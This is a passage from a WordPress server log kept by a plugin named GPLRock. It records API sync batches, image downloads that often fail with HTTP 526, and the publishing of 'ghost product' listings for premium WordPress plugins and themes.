pre-downloaded image for product wpforms-paypal-standard: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-35173818.jpg [09-Mar-2026 05:51:45 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-paypal-standard [09-Mar-2026 05:51:46 UTC] GPLRock: Image downloaded successfully for product wpforms-offline-forms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11fb845a.jpg [09-Mar-2026 05:51:46 UTC] GPLRock: Using pre-downloaded image for product wpforms-offline-forms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11fb845a.jpg [09-Mar-2026 05:51:46 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-offline-forms [09-Mar-2026 05:51:47 UTC] GPLRock: Image downloaded successfully for product wpforms-form-pages (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c059b8c7.jpg [09-Mar-2026 05:51:47 UTC] GPLRock: Using pre-downloaded image for product wpforms-form-pages: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c059b8c7.jpg [09-Mar-2026 05:51:47 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-form-pages [09-Mar-2026 05:51:48 UTC] GPLRock: Image downloaded successfully for product wpforms-form-locker (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b6b9907.jpg [09-Mar-2026 05:51:48 UTC] GPLRock: Using pre-downloaded image for product wpforms-form-locker: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b6b9907.jpg [09-Mar-2026 05:51:48 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-form-locker [09-Mar-2026 05:51:49 UTC] GPLRock: Image downloaded successfully for product wpforms-drip (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-69af4605.jpg [09-Mar-2026 05:51:49 UTC] GPLRock: Using pre-downloaded image for product wpforms-drip: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-69af4605.jpg [09-Mar-2026 05:51:49 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-drip [09-Mar-2026 05:51:50 UTC] GPLRock: Image downloaded successfully for product super-forms-popups (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d983b0eb.jpg [09-Mar-2026 05:51:50 UTC] GPLRock: Using pre-downloaded image for product super-forms-popups: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d983b0eb.jpg [09-Mar-2026 05:51:50 UTC] GPLRock: Ghost product published with image - Product ID: super-forms-popups [09-Mar-2026 05:51:52 UTC] GPLRock: Image downloaded successfully for product taptap-a-super-customizable-wordpress-mobile-menu (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-085b052e.jpg [09-Mar-2026 05:51:52 UTC] GPLRock: Using pre-downloaded image for product taptap-a-super-customizable-wordpress-mobile-menu: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-085b052e.jpg [09-Mar-2026 05:51:52 UTC] GPLRock: Ghost product published with image - Product ID: taptap-a-super-customizable-wordpress-mobile-menu [09-Mar-2026 05:51:53 UTC] GPLRock: Image downloaded successfully for product mr-tailor-responsive-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c9b0fd6d.jpg [09-Mar-2026 05:51:54 UTC] GPLRock: Using pre-downloaded image for product mr-tailor-responsive-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c9b0fd6d.jpg [09-Mar-2026 05:51:54 UTC] GPLRock: Ghost product published with image - Product ID: mr-tailor-responsive-woocommerce-theme [09-Mar-2026 05:51:56 UTC] GPLRock: Image downloaded successfully for product woocommerce-customer-order-coupon-csv-import-suite (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d359794f.jpg [09-Mar-2026 05:51:56 UTC] GPLRock: Using pre-downloaded image for product woocommerce-customer-order-coupon-csv-import-suite: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d359794f.jpg [09-Mar-2026 05:51:56 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-customer-order-coupon-csv-import-suite [09-Mar-2026 11:31:09 UTC] GPLRock API Sync: Batch başlıyor - Offset: 5500, Total: 3200/9737 [09-Mar-2026 11:31:10 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 11:31:10 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 11:31:10 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 11:31:10 UTC] GPLRock API Sync: Batch başlıyor - Offset: 5600, Total: 3300/9737 [09-Mar-2026 11:31:11 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 11:31:11 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 12:57:15 UTC] GPLRock: Image download failed for product wphobby-addons-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:17 UTC] GPLRock: Image download failed for product wphobby-addons-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wphobby-addons-for-elementor-15080.webp for product wphobby-addons-for-elementor after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 12:57:19 UTC] GPLRock: Image download failed for product wphobby-addons-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:21 UTC] GPLRock: Image download failed for product wphobby-addons-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wphobby-addons-for-elementor-15080.webp for product wphobby-addons-for-elementor after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 12:57:24 UTC] GPLRock WARNING: Image download failed for product wphobby-addons-for-elementor. URL: https://meldwp.com/wp-content/uploads/wphobby-addons-for-elementor-15080.webp [09-Mar-2026 12:57:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wphobby-addons-for-elementor [09-Mar-2026 12:57:24 UTC] GPLRock: Image download failed for product gravity-forms-discord-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:26 UTC] GPLRock: Image download failed for product gravity-forms-discord-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gravity-forms-discord-integration-10021.webp for product gravity-forms-discord-integration after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 12:57:28 UTC] GPLRock: Image download failed for product gravity-forms-discord-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:30 UTC] GPLRock: Image download failed for product gravity-forms-discord-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gravity-forms-discord-integration-10021.webp for product gravity-forms-discord-integration after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 12:57:33 UTC] GPLRock WARNING: Image download failed for product gravity-forms-discord-integration. URL: https://meldwp.com/wp-content/uploads/gravity-forms-discord-integration-10021.webp [09-Mar-2026 12:57:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gravity-forms-discord-integration [09-Mar-2026 12:57:33 UTC] GPLRock: Image downloaded successfully for product chartli-wordpress-interactive-chart-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14d51fa3.webp [09-Mar-2026 12:57:33 UTC] GPLRock: Using pre-downloaded image for product chartli-wordpress-interactive-chart-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14d51fa3.webp [09-Mar-2026 12:57:33 UTC] GPLRock: Ghost product published with image - Product ID: chartli-wordpress-interactive-chart-plugin [09-Mar-2026 12:57:33 UTC] GPLRock: Image downloaded successfully for product hover-box-elementor-page-builder-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-398018ed.webp [09-Mar-2026 12:57:33 UTC] GPLRock: Using pre-downloaded image for product hover-box-elementor-page-builder-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-398018ed.webp [09-Mar-2026 12:57:33 UTC] GPLRock: Ghost product published with image - Product ID: hover-box-elementor-page-builder-addon [09-Mar-2026 12:57:33 UTC] GPLRock: Image download failed for product clloh-chosen-field-for-elementor-form (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:35 UTC] GPLRock: Image download failed for product clloh-chosen-field-for-elementor-form (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clloh-chosen-field-for-elementor-form-20225.webp for product clloh-chosen-field-for-elementor-form after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 12:57:37 UTC] GPLRock: Image download failed for product clloh-chosen-field-for-elementor-form (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:39 UTC] GPLRock: Image download failed for product clloh-chosen-field-for-elementor-form (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clloh-chosen-field-for-elementor-form-20225.webp for product clloh-chosen-field-for-elementor-form after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 12:57:41 UTC] GPLRock WARNING: Image download failed for product clloh-chosen-field-for-elementor-form. URL: https://meldwp.com/wp-content/uploads/clloh-chosen-field-for-elementor-form-20225.webp [09-Mar-2026 12:57:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: clloh-chosen-field-for-elementor-form [09-Mar-2026 12:57:42 UTC] GPLRock: Image download failed for product ninja-popup-rest-api (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:44 UTC] GPLRock: Image download failed for product ninja-popup-rest-api (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ninja-popup-rest-api-22401.webp for product ninja-popup-rest-api after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 12:57:46 UTC] GPLRock: Image download failed for product ninja-popup-rest-api (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:48 UTC] GPLRock: Image download failed for product ninja-popup-rest-api (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ninja-popup-rest-api-22401.webp for product ninja-popup-rest-api after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 12:57:50 UTC] GPLRock WARNING: Image download failed for product ninja-popup-rest-api. URL: https://meldwp.com/wp-content/uploads/ninja-popup-rest-api-22401.webp [09-Mar-2026 12:57:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ninja-popup-rest-api [09-Mar-2026 12:57:51 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-carousel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:53 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-carousel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---carousel-28727.webp for product wpbakery-page-builder-add-on-carousel after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 12:57:57 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-carousel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:57:59 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-carousel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:58:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---carousel-28727.webp for product wpbakery-page-builder-add-on-carousel after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 12:58:01 UTC] GPLRock WARNING: Image download failed for product wpbakery-page-builder-add-on-carousel. URL: https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---carousel-28727.webp [09-Mar-2026 12:58:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbakery-page-builder-add-on-carousel [09-Mar-2026 12:58:01 UTC] GPLRock: Image download failed for product the-wall-media-gallery-jquery-powered (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:58:03 UTC] GPLRock: Image download failed for product the-wall-media-gallery-jquery-powered (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:58:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-wall---media-gallery---jquery-powered-29178.webp for product the-wall-media-gallery-jquery-powered after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 12:58:05 UTC] GPLRock: Image download failed for product the-wall-media-gallery-jquery-powered (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:58:07 UTC] GPLRock: Image download failed for product the-wall-media-gallery-jquery-powered (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:58:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-wall---media-gallery---jquery-powered-29178.webp for product the-wall-media-gallery-jquery-powered after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 12:58:09 UTC] GPLRock WARNING: Image download failed for product the-wall-media-gallery-jquery-powered. URL: https://meldwp.com/wp-content/uploads/the-wall---media-gallery---jquery-powered-29178.webp [09-Mar-2026 12:58:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-wall-media-gallery-jquery-powered [09-Mar-2026 12:58:09 UTC] GPLRock: Image download failed for product wordpress-easy-menu-editor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:58:12 UTC] GPLRock: Image download failed for product wordpress-easy-menu-editor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:58:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-easy-menu-editor-12449.webp for product wordpress-easy-menu-editor after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 12:58:14 UTC] GPLRock: Image download failed for product wordpress-easy-menu-editor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:58:16 UTC] GPLRock: Image download failed for product wordpress-easy-menu-editor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 12:58:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-easy-menu-editor-12449.webp for product wordpress-easy-menu-editor after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 12:58:18 UTC] GPLRock WARNING: Image download failed for product wordpress-easy-menu-editor. URL: https://meldwp.com/wp-content/uploads/wordpress-easy-menu-editor-12449.webp [09-Mar-2026 12:58:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-easy-menu-editor [09-Mar-2026 12:58:18 UTC] GPLRock: Image downloaded successfully for product cf7-envato-market-item-support-request-form-contact-form-7-form-with-purchase-code-verification (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b1ccd521.webp [09-Mar-2026 12:58:18 UTC] GPLRock: Using pre-downloaded image for product cf7-envato-market-item-support-request-form-contact-form-7-form-with-purchase-code-verification: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b1ccd521.webp [09-Mar-2026 12:58:18 UTC] GPLRock: Ghost product published with image - Product ID: cf7-envato-market-item-support-request-form-contact-form-7-form-with-purchase-code-verification [09-Mar-2026 12:58:19 UTC] GPLRock API Sync: Batch başlıyor - Offset: 5700, Total: 3400/9737 [09-Mar-2026 12:58:20 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 12:58:20 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 12:58:20 UTC] GPLRock API Sync: Batch başlıyor - Offset: 5800, Total: 3500/9737 [09-Mar-2026 12:58:21 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 12:58:21 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 12:58:21 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [09-Mar-2026 12:58:21 UTC] GPLRock API Sync: Batch başlıyor - Offset: 5900, Total: 3600/9737 [09-Mar-2026 12:58:22 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 12:58:23 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 15:49:17 UTC] GPLRock: Image download failed for product noo-before-after-ultimate-before-after-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:19 UTC] GPLRock: Image download failed for product noo-before-after-ultimate-before-after-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/noo-before-after---ultimate-before-after-plugin-for-wordpress-33505.webp for product noo-before-after-ultimate-before-after-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 15:49:21 UTC] GPLRock: Image download failed for product noo-before-after-ultimate-before-after-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:23 UTC] GPLRock: Image download failed for product noo-before-after-ultimate-before-after-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/noo-before-after---ultimate-before-after-plugin-for-wordpress-33505.webp for product noo-before-after-ultimate-before-after-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 15:49:25 UTC] GPLRock WARNING: Image download failed for product noo-before-after-ultimate-before-after-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/noo-before-after---ultimate-before-after-plugin-for-wordpress-33505.webp [09-Mar-2026 15:49:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: noo-before-after-ultimate-before-after-plugin-for-wordpress [09-Mar-2026 15:49:26 UTC] GPLRock: Image download failed for product advanced-custom-fields-component-field-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:28 UTC] GPLRock: Image download failed for product advanced-custom-fields-component-field-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-custom-fields---component-field-addon-17960.webp for product advanced-custom-fields-component-field-addon after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 15:49:30 UTC] GPLRock: Image download failed for product advanced-custom-fields-component-field-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:32 UTC] GPLRock: Image download failed for product advanced-custom-fields-component-field-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-custom-fields---component-field-addon-17960.webp for product advanced-custom-fields-component-field-addon after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 15:49:34 UTC] GPLRock WARNING: Image download failed for product advanced-custom-fields-component-field-addon. URL: https://meldwp.com/wp-content/uploads/advanced-custom-fields---component-field-addon-17960.webp [09-Mar-2026 15:49:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: advanced-custom-fields-component-field-addon [09-Mar-2026 15:49:35 UTC] GPLRock: Image download failed for product yummomatic-automatic-recipe-post-generator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:37 UTC] GPLRock: Image download failed for product yummomatic-automatic-recipe-post-generator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yummomatic-automatic-recipe-post-generator-plugin-for-wordpress-26192.webp for product yummomatic-automatic-recipe-post-generator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 15:49:39 UTC] GPLRock: Image download failed for product yummomatic-automatic-recipe-post-generator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:41 UTC] GPLRock: Image download failed for product yummomatic-automatic-recipe-post-generator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yummomatic-automatic-recipe-post-generator-plugin-for-wordpress-26192.webp for product yummomatic-automatic-recipe-post-generator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 15:49:43 UTC] GPLRock WARNING: Image download failed for product yummomatic-automatic-recipe-post-generator-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/yummomatic-automatic-recipe-post-generator-plugin-for-wordpress-26192.webp [09-Mar-2026 15:49:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yummomatic-automatic-recipe-post-generator-plugin-for-wordpress [09-Mar-2026 15:49:44 UTC] GPLRock: Image downloaded successfully for product changalab-currency-exchange-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fd051170.webp [09-Mar-2026 15:49:44 UTC] GPLRock: Using pre-downloaded image for product changalab-currency-exchange-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fd051170.webp [09-Mar-2026 15:49:44 UTC] GPLRock: Ghost product published with image - Product ID: changalab-currency-exchange-wordpress-plugin [09-Mar-2026 15:49:44 UTC] GPLRock: Image downloaded successfully for product woocommerce-refund-and-exchange-with-rma-warranty-management-refund-policy-manage-user-wallet (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2935eed0.webp [09-Mar-2026 15:49:44 UTC] GPLRock: Using pre-downloaded image for product woocommerce-refund-and-exchange-with-rma-warranty-management-refund-policy-manage-user-wallet: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2935eed0.webp [09-Mar-2026 15:49:44 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-refund-and-exchange-with-rma-warranty-management-refund-policy-manage-user-wallet [09-Mar-2026 15:49:44 UTC] GPLRock: Image download failed for product vimuse-html5-media-player (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:46 UTC] GPLRock: Image download failed for product vimuse-html5-media-player (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vimuse---html5-media-player-1732.webp for product vimuse-html5-media-player after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 15:49:49 UTC] GPLRock: Image download failed for product vimuse-html5-media-player (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:51 UTC] GPLRock: Image download failed for product vimuse-html5-media-player (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vimuse---html5-media-player-1732.webp for product vimuse-html5-media-player after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 15:49:53 UTC] GPLRock WARNING: Image download failed for product vimuse-html5-media-player. URL: https://meldwp.com/wp-content/uploads/vimuse---html5-media-player-1732.webp [09-Mar-2026 15:49:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vimuse-html5-media-player [09-Mar-2026 15:49:53 UTC] GPLRock: Image downloaded successfully for product affiliatepro-saas-affiliate-vendor-system-mobile-app-ai-telegram (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-800e4bb1.webp [09-Mar-2026 15:49:53 UTC] GPLRock: Using pre-downloaded image for product affiliatepro-saas-affiliate-vendor-system-mobile-app-ai-telegram: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-800e4bb1.webp [09-Mar-2026 15:49:53 UTC] GPLRock: Ghost product published with image - Product ID: affiliatepro-saas-affiliate-vendor-system-mobile-app-ai-telegram [09-Mar-2026 15:49:54 UTC] GPLRock: Image download failed for product interactive-timeline-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:56 UTC] GPLRock: Image download failed for product interactive-timeline-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:49:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/interactive-timeline-addon-for-elementor-4134.webp for product interactive-timeline-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 15:49:58 UTC] GPLRock: Image download failed for product interactive-timeline-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:50:00 UTC] GPLRock: Image download failed for product interactive-timeline-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:50:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/interactive-timeline-addon-for-elementor-4134.webp for product interactive-timeline-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 15:50:02 UTC] GPLRock WARNING: Image download failed for product interactive-timeline-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/interactive-timeline-addon-for-elementor-4134.webp [09-Mar-2026 15:50:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: interactive-timeline-addon-for-elementor [09-Mar-2026 15:50:03 UTC] GPLRock: Image downloaded successfully for product woocommerce-event-qr-code-email-tickets (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dff78b51.webp [09-Mar-2026 15:50:03 UTC] GPLRock: Using pre-downloaded image for product woocommerce-event-qr-code-email-tickets: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dff78b51.webp [09-Mar-2026 15:50:03 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-event-qr-code-email-tickets [09-Mar-2026 15:50:04 UTC] GPLRock: Image download failed for product enliven-em-svg-animation-engine-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:50:06 UTC] GPLRock: Image download failed for product enliven-em-svg-animation-engine-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:50:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enliven-em---svg-animation-engine-for-wordpress-18262.webp for product enliven-em-svg-animation-engine-for-wordpress after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 15:50:08 UTC] GPLRock: Image download failed for product enliven-em-svg-animation-engine-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:50:10 UTC] GPLRock: Image download failed for product enliven-em-svg-animation-engine-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 15:50:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enliven-em---svg-animation-engine-for-wordpress-18262.webp for product enliven-em-svg-animation-engine-for-wordpress after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 15:50:12 UTC] GPLRock WARNING: Image download failed for product enliven-em-svg-animation-engine-for-wordpress. URL: https://meldwp.com/wp-content/uploads/enliven-em---svg-animation-engine-for-wordpress-18262.webp [09-Mar-2026 15:50:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: enliven-em-svg-animation-engine-for-wordpress [09-Mar-2026 15:50:15 UTC] GPLRock API Sync: Batch başlıyor - Offset: 6000, Total: 3700/9737 [09-Mar-2026 15:50:15 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 15:50:15 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 15:50:18 UTC] GPLRock API Sync: Batch başlıyor - Offset: 6100, Total: 3800/9737 [09-Mar-2026 15:50:19 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 15:50:19 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 15:50:19 UTC] GPLRock Auto Sync Cron: API sync batch 